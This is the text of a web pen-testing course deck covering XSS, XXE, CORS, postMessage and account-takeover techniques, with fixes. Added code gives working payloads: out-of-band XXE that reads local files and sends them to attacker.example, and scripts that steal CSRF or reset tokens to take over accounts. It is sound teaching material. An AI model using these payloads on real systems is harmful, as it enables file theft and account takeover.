Web Application Pen-Testing Course
Who am I?
Mohamed Sayed
• Also known as FlEx.
• Cyber Security Engineer @ CyShield.
• I also make videos about hacking on YouTube.
• [Small] Bug Hunter.
What will we talk about?
• What you need to start.
• How web apps work.
• Vulnerabilities:
  • Explain the vulnerability.
  • Solve a lab for it.
  • Types of attacks for this vulnerability.
  • Explain the code that causes the bug.
  • Fix the bug in the code.
• How to write a report.
• Skills you need.
• How to get good & next steps.
What you need to start
Web Applications
● Client side [HTML, JS, CSS]
● Server side [PHP, [Link], etc.]
● HTTP / HTTPS
● What headers are
HTTP / HTTPS
Comparison           HTTP    HTTPS
Secured              False   True
Default port         80      443
TLS/SSL certificate  False   True
Encryption           False   True
What headers are
Header        Meaning (example)
Host          The host name the request is addressed to
              (Host: [Link])
User-Agent    The client/browser information
              (User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0)
Content-Type  The media type of the request or response body
              (Content-Type: application/json)
Referer       The URL of the page the request came from
              (Referer: [Link])
Vulnerabilities
• XSS
• CSRF
• LFI / Path traversal
• IDOR
• File Upload
• SQL injection
• Insecure Deserialization
• XXE
• Clickjacking
• JSONP
• Account Takeover
• PostMessage
• CORS
• How to Chain Bugs?
Vulnerabilities (XSS)
• What is XSS?
• What can I do with XSS?
• Types of XSS.
• Filters & Bypasses for XSS.
• Solve XSS Lab.
• Patch bug in code.
Vulnerabilities (CSRF)
• What is CSRF?
• What can I do with CSRF?
• Bypasses for CSRF.
• Solve Lab.
• Patch bug in code.
Vulnerabilities (LFI/Path traversal)
• What are LFI & path traversal?
• What is the difference between LFI & path traversal?
• What can I do with LFI & path traversal?
• Solve lab.
• Patch bug in code.
Vulnerabilities (IDOR)
• What is IDOR?
• What can I do with IDOR?
• Solve Lab
• Patch bug in code.
Vulnerabilities (File Upload)
• What is File Upload vulnerability?
• What can I do with File Upload vulnerability?
• Filters & Bypasses for File upload.
• Solve lab.
• Patch bug in code.
Vulnerabilities (SQL injection)
• What is SQL injection?
• What can I do with SQL injection?
• Types of SQL injection.
• Filters and Bypasses for SQL Injection.
• Solve lab.
• Patch bug in code.
Vulnerabilities (Insecure Deserialization)
• What is Insecure Deserialization?
• What can I do with Insecure Deserialization?
• Solve lab.
• Patch bug in code.
Vulnerabilities (XXE)
• What is XML & XXE?
• What can I do with XXE?
• Why do websites use XML?
• Types of XXE.
• Solve lab.
• Patch bug in code.
Structure of the XML document on the slide:
The first line contains the metadata (the XML declaration).
The second line contains the opening of the root element.
The third and fourth lines are children of the root element.
The fifth line closes the root element.
Rules:
1. Tag names are case sensitive.
2. ‘ ” > < cannot be written directly into the XML document where they would be read as markup; use the predefined entities instead.
Entity: think of it as a variable.
The document type definition (DTD) is where entities are defined.
Entity types
● General
  The type we saw in the previous example (declared as <!ENTITY name "value">, referenced as &name;).
● Parameter
  Usable only inside the DTD (declared as <!ENTITY % name "value">, referenced as %name;); useful for building an entity whose value references another entity.
● Predefined
  Used for characters that would otherwise break the syntax, e.g. &lt; for <.
Features we can use
1. With the SYSTEM keyword an entity can be external, i.e. its value is loaded from a URI.
2. XML accepts any valid URI (file://, http://, ...), so the parser can be made to read local files or send requests.
Types
• Inband
  • The common type: the entity's content is displayed in the response.
• Error based
  • The response shows only parser errors, so the content has to be leaked through the error message.
• Out of band (OOB)
  • Blind: no result and no error. Make the parser send a request to a server you control to confirm the injection and carry the data out.
Exploit
Inband type
Send payload in request → vulnerable function parses the payload → result is printed.
Error based
Send payload in request → vulnerable function parses the payload → an error containing the payload result is returned.
Error based example
If we send a payload like the one on the slide, the output comes back inside the error message.
OOB type
Send payload in request → vulnerable function parses the payload → no result is printed, but the payload is executed (the parser makes the request).
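The payload shapes for the three types above, plus the pre-parse check a patched endpoint can apply, as an added example written for this edit (it is not the course's lab code). The file paths, the hosts attacker.example / app.example and the entity names are placeholders chosen for illustration. The small expandInternalEntities helper only handles internal general entities and the predefined ones, enough to show why an entity behaves like a variable; it is not an XML parser.

```javascript
// Added example: XXE payload shapes and a pre-parse DTD check.
// attacker.example, the file paths and the entity names are placeholders.

// Inband: the external entity is expanded into an element the app echoes back.
function inbandPayload(file) {
  return `<?xml version="1.0"?>
<!DOCTYPE data [ <!ENTITY xxe SYSTEM "file://${file}"> ]>
<data><item>&xxe;</item></data>`;
}

// Error based and OOB both rely on parameter entities (% name) that build a
// second entity whose SYSTEM URI embeds the file contents. That trick is only
// allowed in an external DTD, so the XML body points at a DTD the attacker
// hosts and the DTD does the work.
function externalDtdPayload(dtdUrl) {
  return `<?xml version="1.0"?>
<!DOCTYPE data [ <!ENTITY % dtd SYSTEM "${dtdUrl}"> %dtd; ]>
<data><item>x</item></data>`;
}

function errorBasedDtd(file) {
  // Forcing a fetch of a path that does not exist makes the parser report the
  // path in its error, and the path contains the file contents.
  return `<!ENTITY % file SYSTEM "file://${file}">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;`;
}

function oobDtd(file, collectorUrl) {
  // Blind: the parser fetches collectorUrl with the file in the query string.
  // Multi-line files break the URI, so start with single-line targets such as
  // /etc/hostname when confirming the bug.
  return `<!ENTITY % file SYSTEM "file://${file}">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM '${collectorUrl}?d=%file;'>">
%eval;
%exfil;`;
}

// Patch side: the simplest safe policy is to refuse any document that carries
// a DOCTYPE or entity declaration before it reaches the parser, on top of
// configuring the parser not to load external entities or DTDs.
function containsDtd(xml) {
  return /<!DOCTYPE/i.test(xml) || /<!ENTITY/i.test(xml);
}

// Toy expander for internal general entities plus the predefined ones. It
// shows the "entity = variable" idea; it is not an XML parser.
const PREDEFINED = { lt: '<', gt: '>', amp: '&', apos: "'", quot: '"' };

function expandInternalEntities(xml) {
  const entities = { ...PREDEFINED };
  const decl = /<!ENTITY\s+(\w+)\s+"([^"]*)"\s*>/g;
  let m;
  while ((m = decl.exec(xml)) !== null) entities[m[1]] = m[2];
  const body = xml
    .replace(/<\?xml[^>]*\?>\s*/, '')
    .replace(/<!DOCTYPE[\s\S]*?\]>\s*/, '');
  return body.replace(/&(\w+);/g, (ref, name) =>
    Object.prototype.hasOwnProperty.call(entities, name) ? entities[name] : ref);
}

// Print the payloads for a run against a hypothetical target.
console.log(inbandPayload('/etc/passwd'));
console.log(externalDtdPayload('https://attacker.example/evil.dtd'));
console.log(oobDtd('/etc/hostname', 'https://attacker.example/collect'));
```

Serve the DTD returned by errorBasedDtd or oobDtd from the attacker host and send externalDtdPayload pointing at it; the inband payload needs no external host at all. On the patch side, containsDtd is a cheap first gate; the parser flags that disable entity loading are still required, since the check is skipped by any code path that parses XML elsewhere.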
Vulnerabilities (Clickjacking)
• What is Clickjacking?
• What can I do with Clickjacking?
• Solve lab.
• Patch bug.
Vulnerabilities (JSONP)
• What is JSONP?
• What can I do with JSONP?
• Why do websites use JSONP?
• Solve lab.
• Patch bug.
Vulnerabilities (ATO)
• What is ATO?
• How to gain ATO?
• Patch bugs.
How to gain ATO
• CSRF
• IDOR
• Host Header injection
• Open redirect with OAuth
• CSRF with OAuth
How to gain ATO (CSRF)
Exploit page → sends the request → vulnerable page changes the email when it receives the request.
How to gain ATO (IDOR)
User 1000 changes the email of user 1000 → 200 OK
User 1000 changes the email of user 1001 → 200 OK (no ownership check)
How to gain ATO (Host Header Injection)
1. Use the forgot-password function and catch the request.
2. Change the Host header value to your domain.
3. If vulnerable, the reset link is sent to the victim with your domain in it.
4. The victim opens the link and the token is sent to your domain.
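The server-side bug behind the flow above, next to its fix, as an added example (not code from the course). app.example and attacker.example are placeholder hosts; the header names and the reset path are assumptions for illustration.

```javascript
// Added example: password-reset link built from the Host header (vulnerable)
// versus from server-side configuration (fixed). Hosts are placeholders.

const CANONICAL_ORIGIN = 'https://app.example';
const ALLOWED_HOSTS = new Set(['app.example', 'www.app.example']);

// Vulnerable: trusts whichever host the client sent. Many frameworks also
// honour X-Forwarded-Host, so an attacker who cannot change Host directly
// (virtual hosting routes the request elsewhere) often still wins through it.
function resetLinkVulnerable(headers, token) {
  const host = headers['x-forwarded-host'] || headers['host'];
  return `https://${host}/reset?token=${encodeURIComponent(token)}`;
}

// Fixed: never derive the public origin from request headers. Reject
// unexpected hosts outright instead of reflecting them.
function resetLinkFixed(headers, token) {
  const host = headers['host'];
  if (!ALLOWED_HOSTS.has(host)) {
    throw new Error(`unexpected Host header: ${host}`);
  }
  return `${CANONICAL_ORIGIN}/reset?token=${encodeURIComponent(token)}`;
}

// Constructed sample of the attacker's forgot-password request headers.
const ATTACKER_HEADERS = { host: 'attacker.example' };

console.log(resetLinkVulnerable(ATTACKER_HEADERS, 'tok123'));
```

The link the vulnerable version emails to the victim points at attacker.example, so the attacker's web server logs the token as soon as the victim clicks. The fixed version also covers the X-Forwarded-Host variant because it never reads that header.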
OAuth
Client application      The web app that wants to access the user's data.
Resource owner          The user.
OAuth service provider  The application that controls the user's data and access to it.
OAuth flow (Client App / User-Agent / OAuth service / API)
1. Auth request: the client app sends the user-agent to the OAuth service (/auth).
2. The resource owner (user) logs in & consents.
3. An access token is returned to the client app (/oauth-login).
4. The client app makes the API call with the token (/info).
5. Data is returned.
How to gain ATO (Open redirect with OAuth)
How to gain ATO (CSRF with OAuth)
Same flow (Client App / User-Agent / OAuth service / API):
1. Auth request (/auth).
2. The resource owner (user) logs in & consents.
3. Access token & connect social account (/oauth-login): the social account behind the token is linked to the logged-in user.
4. API call (/info).
5. Data.
If step 3 is not bound to the user's session (no state parameter is checked), the attacker completes steps 1-2 with their own social account and makes the victim's browser submit the resulting /oauth-login request, linking the attacker's social account to the victim's account.
Vulnerabilities (PostMessage)
• What is PostMessage?
• What can I do with PostMessage?
• How postMessage becomes a bug.
• Solve lab.
• Patch bug.
Explanation
We can use postMessage with an iframe or a pop-up.
To create an event listener we give it an event name and a function to call when it fires; this function takes the value sent by postMessage and acts on it.
[Link] gives the origin that sent the message.
[Link] gives the value that was sent.
We can use a check like the following to validate the origin before taking the value, but the check has an issue and can be bypassed.
Exploit
The vulnerable page has a listener.
The exploit page loads the vulnerable page in an iframe and sends a postMessage with a malicious value, e.g. an XSS payload.
The two pages communicate using postMessage.
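The listener with the kind of loose origin check the slides warn about, a strict check beside it, and the exploit page that frames the vulnerable page, as an added example (not the lab's code). https://app.example is the origin that should be trusted and attacker.example the exploit host; both, the widget path and the element id are placeholders. The handler takes its sink as a parameter so the accept/reject decision can be exercised outside a browser.

```javascript
// Added example: postMessage origin checks, weak vs strict, plus the exploit page.
// app.example / attacker.example are placeholders.

const TRUSTED_ORIGIN = 'https://app.example';

// Weak: substring match. Any origin that merely contains the host name passes.
function weakOriginCheck(origin) {
  return origin.indexOf('app.example') !== -1;
}

// Also weak: prefix match still lets https://app.example.attacker.example through.
function prefixOriginCheck(origin) {
  return origin.startsWith(TRUSTED_ORIGIN);
}

// Strict: exact comparison of scheme + host + port.
function strictOriginCheck(origin) {
  return origin === TRUSTED_ORIGIN;
}

// The listener body. `sink` stands in for what the page does with the value
// (element.innerHTML = data in the vulnerable version). Returns true when the
// message was accepted.
function handleMessage(event, check, sink) {
  if (!check(event.origin)) return false;
  sink(event.data);
  return true;
}

// Browser wiring for the vulnerable page (only meaningful where window exists):
//   window.addEventListener('message', e =>
//     handleMessage(e, weakOriginCheck, d => { document.getElementById('out').innerHTML = d; }));
// Patched: strictOriginCheck, and write with textContent instead of innerHTML.

// Exploit page: frame the vulnerable page and post the payload into it.
function exploitPage(vulnerableUrl, payload) {
  return `<iframe id="v" src="${vulnerableUrl}"></iframe>
<script>
  document.getElementById('v').onload = () =>
    document.getElementById('v').contentWindow.postMessage(${JSON.stringify(payload)}, '*');
</script>`;
}

// Origins an attacker can own that satisfy the weak check.
const BYPASS_ORIGINS = [
  'https://app.example.attacker.example', // trusted name as a subdomain label
  'https://evilapp.example',              // trusted name as a suffix
  'http://app.example',                   // scheme downgrade
];

console.log(exploitPage('https://app.example/widget', '<img src=x onerror=alert(document.domain)>'));
```

Host the output of exploitPage on attacker.example; the frame's contentWindow receives the message with event.origin set to the attacker's origin, which the weak checks accept. The prefix check fails on the first bypass origin, the substring check on all three, and only the exact comparison rejects every one.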
Vulnerabilities (CORS)
• What is CORS?
• What can I do with CORS?
• Why websites use CORS?
• Bypass Filter.
• Solve Labs.
• Patch Bug.
Vulnerabilities (Chaining Bugs)
• XSS to ATO
• Self-XSS to Reflected XSS
• CORS without a useful result
XSS to ATO
Found XSS → use the payload to steal the CSRF token from the page → use the CSRF token to send the request that changes the victim's email.
XSS to ATO exploit
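The chain above written as the JavaScript an injected payload would run in the victim's browser, as an added example (not the course's exploit). The paths /my-account and /my-account/change-email, the form field names csrf and email, and the sample page are assumptions constructed for illustration; fetch is injectable so the token-stealing step can be exercised outside a browser.

```javascript
// Added example: XSS -> steal CSRF token -> change the victim's email.
// Paths, field names and the sample page are placeholders.

// Step 1: pull the anti-CSRF token out of the account page. The payload runs
// same-origin, so it can read the response body, which a plain CSRF page
// never could; that is why the token does not stop this chain.
function extractCsrfToken(html) {
  const m = html.match(/name="csrf"\s+value="([^"]+)"/i);
  return m ? m[1] : null;
}

// Step 2: the state-changing request the token unlocks.
function changeEmailRequest(token, newEmail) {
  return {
    url: '/my-account/change-email',
    method: 'POST',
    headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
    body: new URLSearchParams({ csrf: token, email: newEmail }).toString(),
  };
}

// The full payload. fetchImpl defaults to the browser's fetch; tests pass a fake.
async function takeover(newEmail, fetchImpl = globalThis.fetch) {
  const page = await fetchImpl('/my-account', { credentials: 'include' });
  const token = extractCsrfToken(await page.text());
  if (!token) throw new Error('no CSRF token on page');
  const req = changeEmailRequest(token, newEmail);
  return fetchImpl(req.url, {
    method: req.method,
    headers: req.headers,
    body: req.body,
    credentials: 'include',
  });
}

// Constructed sample of the victim's account page.
const SAMPLE_PAGE = `<form action="/my-account/change-email" method="POST">
  <input type="hidden" name="csrf" value="Q7zK9pLx3Rv1">
  <input name="email" value="victim@app.example">
</form>`;

console.log(changeEmailRequest(extractCsrfToken(SAMPLE_PAGE), 'attacker@attacker.example'));
```

Once the email is changed the attacker runs forgot-password against it and owns the account. The CSRF token is not the thing to fix here; fixing the XSS is, and requiring the current password or a re-login for email changes limits the damage of the next one.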
Self-XSS to Reflected XSS
- By using clickjacking.
- The victim is tricked into copying the XSS payload into the vulnerable page (the exploit page is laid over the vulnerable page).
Un-exploitable CORS
Exploit server → sends an XMLHttpRequest to the vulnerable endpoint → backend server code returns null or dummy data (nothing worth reading).
Another vulnerable endpoint → send a request that changes a value:
XMLHttpRequest, Content-Type: application/json
Body: {"name":"Hacker"}
→ backend server code returns 200 OK, success (the same CORS misconfiguration lets the cross-origin write through even though the read was useless).
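Why the write still goes through when the read returns nothing, as an added example (not the course's lab code): the vulnerable CORS policy beside a fixed one, a model of the browser's decision for a credentialed JSON request, and the exploit-side XMLHttpRequest. https://app.example, https://attacker.example, the admin subdomain and the /api/profile path are placeholders.

```javascript
// Added example: reflected-origin CORS vs allow-list, the browser's decision,
// and the exploit request. Hosts and paths are placeholders.

// Vulnerable: reflects any Origin and allows credentials.
function corsHeadersVulnerable(requestOrigin) {
  return {
    'Access-Control-Allow-Origin': requestOrigin,
    'Access-Control-Allow-Credentials': 'true',
    'Access-Control-Allow-Methods': 'GET, POST, PUT',
    'Access-Control-Allow-Headers': 'Content-Type',
  };
}

// Fixed: only pre-approved origins get a permissive answer; others get no CORS headers.
const ALLOWED_ORIGINS = new Set(['https://app.example', 'https://admin.app.example']);
function corsHeadersFixed(requestOrigin) {
  if (!ALLOWED_ORIGINS.has(requestOrigin)) return {};
  return {
    'Access-Control-Allow-Origin': requestOrigin,
    'Access-Control-Allow-Credentials': 'true',
    'Access-Control-Allow-Methods': 'GET, POST, PUT',
    'Access-Control-Allow-Headers': 'Content-Type',
    Vary: 'Origin',
  };
}

// Model of what the browser decides for a credentialed cross-origin request
// (will it be sent and the response be readable). A JSON body makes the
// request non-simple, so the preflight must also allow the method and the
// Content-Type header. "*" is never accepted together with credentials.
function browserAllows(headers, origin, method, contentType) {
  if (headers['Access-Control-Allow-Origin'] !== origin) return false;
  if (headers['Access-Control-Allow-Credentials'] !== 'true') return false;
  const simpleMethods = ['GET', 'HEAD', 'POST'];
  const simpleTypes = ['application/x-www-form-urlencoded', 'multipart/form-data', 'text/plain'];
  const needsPreflight = !simpleMethods.includes(method) ||
    (contentType !== undefined && !simpleTypes.includes(contentType));
  if (!needsPreflight) return true;
  const methods = (headers['Access-Control-Allow-Methods'] || '').split(/,\s*/);
  const allowedHdrs = (headers['Access-Control-Allow-Headers'] || '').toLowerCase().split(/,\s*/);
  const methodOk = simpleMethods.includes(method) || methods.includes(method);
  const headerOk = contentType === undefined || simpleTypes.includes(contentType) ||
    allowedHdrs.includes('content-type');
  return methodOk && headerOk;
}

// Exploit-side request, as run from attacker.example in the victim's browser.
function exploitRequest(body) {
  return `var x = new XMLHttpRequest();
x.open('POST', 'https://app.example/api/profile', true);
x.withCredentials = true;
x.setRequestHeader('Content-Type', 'application/json');
x.send(${JSON.stringify(JSON.stringify(body))});`;
}

console.log(exploitRequest({ name: 'Hacker' }));
```

With the reflected policy the preflight for the JSON POST succeeds, the victim's cookies ride along, and the profile is changed: a CSRF with a JSON body that the Content-Type would normally have blocked. The allow-list version answers the preflight with no CORS headers, so the browser never sends the real request. SameSite cookies and a CSRF token on the write endpoint close the same hole from the other side.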
Writing A Good Report
● Choose a good title for the vulnerability.
● Explain the finding.
● Risk and impact [business impact].
● Recommendations.
● Proof of concept.
● References.
● Ref [Link]
Skills
● Scripting / writing code
● Writing reports
● Dealing with clients
● Understanding web technologies
  ○ Protocols
  ○ HTML / HTML5
  ○ Data formats (JSON, XML, CSV)
  ○ Web frameworks
  ○ Programming languages (PHP, JS, etc.)
Improve yourself & Next Step
● PortSwigger
● PentesterLab
● Increase your knowledge [reading * 1000]
● Practice
Thank you
Talk to me if you need anything.
• Facebook: @flex0geek
• Twitter: @flex0geek
• Linkedin: @flex0geek
• Blog: [Link]
• Youtube: [Link]